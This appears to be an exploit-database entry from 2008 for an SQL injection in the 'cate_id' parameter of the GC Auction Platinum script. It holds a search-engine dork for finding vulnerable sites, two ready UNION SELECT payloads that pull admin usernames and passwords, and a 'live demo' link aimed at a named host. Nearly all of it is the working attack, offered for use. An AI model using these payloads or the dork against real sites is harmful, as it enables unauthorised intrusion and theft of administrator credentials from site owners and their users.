id: 3459
date: 07/26/2008
title: GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

================================================================
GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability
================================================================


|___________________________________________________|
|
| GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability
|
|
|___________________________________________________
|                                                   |
|
| DorK   : inurl:category.php?cate_id=
|___________________________________________________|



Exploit:  

www.[target].com/Script/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3+from+admin--

Exploit:2

www.[target].com/Script/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3,4+from+admin--

 



L!VE DEMO: :


http://www.demosgreatclone.com/gca/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3+from+admin--




#  0day.today [2023-03-24]  #